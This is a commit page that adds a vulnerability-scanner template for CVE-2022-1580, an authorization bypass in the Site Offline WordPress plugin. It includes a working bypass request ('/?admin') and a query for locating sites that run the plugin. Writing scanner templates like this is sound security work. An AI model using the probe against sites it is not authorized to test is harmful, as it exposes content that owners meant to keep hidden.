Merge pull request #9730 from Kazgangap/siteoffline

add cve-2022-1580
patch-2
Ritik Chaddha 2024-05-24 11:25:19 +05:30 committed by GitHub
commit 6bf22d7cfb
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 52 additions and 0 deletions

View File

@ -0,0 +1,52 @@
id: CVE-2022-1580
info:
name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass
author: Kazgangap
severity: medium
description: |
The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
remediation: Fixed in 1.5.3
reference:
- https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1580
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2022-1580
cwe-id: CWE-639
epss-score: 0.00058
epss-percentile: 0.24444
cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: freehtmldesigns
product: site_offline
framework: wordpress
publicwww-query: "/wp-content/plugins/site-offline/"
tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"
matchers:
- type: word
internal: true
words:
- 'Site Offline Or Coming Soon Or Maintenance Mode'
- method: GET
path:
- "{{BaseURL}}/?admin"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "wp-block", "author")'
- 'status_code == 200'
condition: and